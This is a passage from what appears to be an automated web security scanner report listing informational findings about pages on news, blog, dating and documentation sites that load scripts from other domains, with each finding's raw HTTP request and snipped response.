Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: collegefootball.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:07:55 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:17:55 GMT
Last-Modified: Sun, 30 Jan 2011 02:05:21 GMT
ETag: "1CBC022260D0680"
Content-Type: text/html
Content-Length: 43460

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
</script>
       <script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
       <script type="text/javascript" src="http://images.video.redacted/js/ch/channels.js"></script>
...[SNIP]...

23.41. http://content.scout.com/a.z

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.scout.com
Path:   /a.z

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /a.z HTTP/1.1
Host: content.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.5.9.1296350713426;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Sun, 30 Jan 2011 02:07:57 GMT
Server: Microsoft-IIS/6.0
Server: Summit
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:17:57 GMT
Content-Type: text/html
Content-Length: 11945

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
</script>
       <script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
       <script type="text/javascript" src="http://images.video.redacted/js/ch/channels.js"></script>
...[SNIP]...

23.42. http://cosmiclog.msnbc.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cosmiclog.msnbc.redacted
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: cosmiclog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:07:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 145284

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Cosmic Log</title>
<meta
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/0b1773ac102ece03c790dc129da13effc9c81457.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/1798a98b07d2f6f3a7134b6460ddafd5a8d8b7ba.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/cosmiclog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/cosmiclog/chrome.js?v=23247"></script>
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.43. http://cosmiclog.msnbc.redacted/_news/2011/01/28/5943271-egyptians-rush-to-save-tuts-riches/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cosmiclog.msnbc.redacted
Path:   /_news/2011/01/28/5943271-egyptians-rush-to-save-tuts-riches/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /_news/2011/01/28/5943271-egyptians-rush-to-save-tuts-riches/?GT1=43001 HTTP/1.1
Host: cosmiclog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Location: http://cosmiclog.msnbc.redacted/_news/2011/01/28/5943271-egyptians-rush-to-save-tuts-riches?GT1=43001
Content-Type: text/html
Cache-Control: max-age=282
Date: Sat, 29 Jan 2011 23:45:48 GMT
Connection: close

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Cosmic Log - Egyptians ru
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a0982aa7c85927affca00c12d01c5d62d5629caf.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/be62a51c8122dbfe2873a3381fba7856187fe888.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/cosmiclog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/cosmiclog/chrome.js?v=23247"></script>
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.44. http://curmudgeons.blogspot.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://curmudgeons.blogspot.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: curmudgeons.blogspot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Expires: Sun, 30 Jan 2011 02:07:57 GMT
Date: Sun, 30 Jan 2011 02:07:57 GMT
Cache-Control: public, max-age=0, must-revalidate, proxy-revalidate
Last-Modified: Sat, 29 Jan 2011 22:50:38 GMT
ETag: "3769e370-63c6-4a98-8a60-8feefd5f390b"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
   <title>Curmudgeons Corner</title>
<style>
body    {background:#666666;margin: 0px;font-family: Verdana, Arial, sans-se
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.assoc-amazon.com/s/asw.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.statcounter.com/counter/counter_xhtml.js"></script>
...[SNIP]...
<!-- End of StatCounter Code -->
<script type="text/javascript" src="http://www.blogger.com/static/v1/common/js/755007736-csitail.js"></script>
...[SNIP]...

23.45. http://dating.redacted/cp.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dating.redacted
Path:   /cp.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /cp.aspx?cpp=/en-us/partner/msn/38028.html&trackingid=526133&bannerid=722762&gc=1&tr=2&keyword=outdoors&gt1=26000 HTTP/1.1
Host: dating.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:45:57 GMT
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: Match=CCount=1&CDate=1/29/2011; expires=Sun, 29-Jan-2012 23:45:55 GMT; path=/
Set-Cookie: dMatch=CCount=1&CDate=1/29/2011; domain=match.com; expires=Sun, 29-Jan-2012 23:45:55 GMT; path=/
Set-Cookie: MatchSession=CDTF=1/29/2011&UMID=c57fd076-00eb-4b20-b207-3fcd3f25ac2a; expires=Sun, 29-Jan-2012 23:45:55 GMT; path=/
Set-Cookie: SECU=TID=526133&ESID=6c55d63f-ab4d-469b-88ee-c43dd2c2cfaf&THEME=215; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52522

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html>
   <head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><link href="/styles/site/core.css?v=8.0.4043.20742" rel="st
...[SNIP]...
</script>


<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/google.js"></script>
<script language="javascript" type="text/javascript" src="http://cp.match.com/scripts/jquery.pngFix.js"></script>
...[SNIP]...
<!--[if !IE]>--><script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.mozcompat.2010.js"></script><!--<![endif]-->

<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js"></script>
...[SNIP]...

23.46. http://dating.redacted/en-us/partner/msn/38028.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dating.redacted
Path:   /en-us/partner/msn/38028.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/partner/msn/38028.html HTTP/1.1
Host: dating.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:45:58 GMT
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: Match=CCount=1&CDate=1/29/2011; expires=Sun, 29-Jan-2012 23:45:57 GMT; path=/
Set-Cookie: dMatch=CCount=1&CDate=1/29/2011; domain=match.com; expires=Sun, 29-Jan-2012 23:45:57 GMT; path=/
Set-Cookie: MatchSession=CDTF=1/29/2011&UMID=1d011f98-ba73-4855-b224-c4cf627b237b; expires=Sun, 29-Jan-2012 23:45:57 GMT; path=/
Set-Cookie: SECU=TID=516068&ESID=58b22e78-d897-4147-94de-7181130c66ec&THEME=84; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52342

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html>
   <head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><link href="/styles/site/core.css?v=8.0.4043.20742" rel="st
...[SNIP]...
</script>


<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/google.js"></script>
<script language="javascript" type="text/javascript" src="http://cp.match.com/scripts/jquery.pngFix.js"></script>
...[SNIP]...
<!--[if !IE]>--><script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.mozcompat.2010.js"></script><!--<![endif]-->

<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js"></script>
...[SNIP]...

23.47. http://dating.redacted/index.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dating.redacted
Path:   /index.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /index.aspx HTTP/1.1
Host: dating.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:45:48 GMT
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: Match=CCount=1&CDate=1/29/2011; expires=Sun, 29-Jan-2012 23:45:48 GMT; path=/
Set-Cookie: dMatch=CCount=1&CDate=1/29/2011; domain=match.com; expires=Sun, 29-Jan-2012 23:45:48 GMT; path=/
Set-Cookie: MatchSession=CDTF=1/29/2011&UMID=be2ed4ee-f5a1-4aa4-bb78-4689f6d90efb; expires=Sun, 29-Jan-2012 23:45:48 GMT; path=/
Set-Cookie: SECU=TID=516068&ESID=6b75de65-2551-4051-a775-8f526e3162c3&THEME=215; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43950

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html>
   <head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><link href="/styles/site/core.css?v=8.0.4043.20742" rel="st
...[SNIP]...
<meta name="description" content="MSN Dating & Personals with Match.com is a leading online dating site for singles to search through over 15 million users." />
<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/google.js"></script>
<script type="text/javascript" src="http://cp.match.com/scripts/jquery.shuffle.js"></script>
...[SNIP]...
<!--[if !IE]>--><script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.mozcompat.2010.js"></script><!--<![endif]-->

<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js"></script>
...[SNIP]...

23.48. http://dating.redacted/search/index.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dating.redacted
Path:   /search/index.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /search/index.aspx HTTP/1.1
Host: dating.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:45:49 GMT
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: Match=CCount=1&CDate=1/29/2011; expires=Sun, 29-Jan-2012 23:45:48 GMT; path=/
Set-Cookie: dMatch=CCount=1&CDate=1/29/2011; domain=match.com; expires=Sun, 29-Jan-2012 23:45:48 GMT; path=/
Set-Cookie: MatchSession=CDTF=1/29/2011&UMID=b2dc8c0f-b300-4020-86ce-39e4f8fd9272; expires=Sun, 29-Jan-2012 23:45:48 GMT; path=/
Set-Cookie: SECU=TID=516068&ESID=e6d8d8dd-063a-4700-a8ac-b5738414eb12&THEME=215; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 84136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
   <head><meta http-equiv=
...[SNIP]...
<!--[if !IE]>--><script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.mozcompat.2010.js"></script><!--<![endif]-->

<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js"></script>
...[SNIP]...

23.49. http://digg.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /search

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /search HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:21:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=24569 10.2.128.190
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 7917


<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Search
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, po
...[SNIP]...
</div>
<script src="http://cdn1.diggstatic.com/js/common/fb_loader.4050a241.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://cdn2.diggstatic.com/js/lib.b29284a6.js" type="text/javascript"></script>
<script src="http://cdn1.diggstatic.com/js/App_Search/index.754d0683.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn3.diggstatic.com/js/Omniture/omniture.6c48dd51.js" type="text/javascript"></script>
...[SNIP]...

23.50. http://docs.jquery.com/Plugins/Validation

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /Plugins/Validation

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Plugins/Validation HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:08:11 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Wed, 08 Dec 2010 11:37:59 GMT
Content-language: en
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 54082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

23.51. http://docs.jquery.com/UI

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /UI HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:41:11 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Wed, 25 Aug 2010 15:56:34 GMT
Content-language: en
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

23.52. http://docs.jquery.com/UI/Effects/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI/Effects/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /UI/Effects/ HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:41:14 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Wed, 25 Aug 2010 13:24:58 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

23.53. http://docs.jquery.com/UI/Effects/Blind

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI/Effects/Blind

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /UI/Effects/Blind HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:41:14 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Wed, 25 Aug 2010 13:24:58 GMT
Content-language: en
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

23.54. http://docs.jquery.com/UI/Tabs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI/Tabs

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /UI/Tabs HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:41:14 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
